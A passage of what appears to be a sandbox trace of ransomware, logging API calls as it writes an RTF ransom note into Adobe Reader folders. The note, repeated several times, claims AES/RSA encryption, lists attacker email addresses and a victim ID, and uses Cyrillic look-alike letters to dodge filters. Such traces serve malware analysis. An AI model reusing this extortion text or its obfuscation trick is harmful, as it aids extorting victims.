receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1ea7288, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0066.022] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea7288*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1ea7288*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.023] CloseHandle (hObject=0x1fc) returned 1 [0066.024] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\bg85_info.rtf")) returned 0xffffffff [0066.024] GetLastError () returned 0x2 [0066.024] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 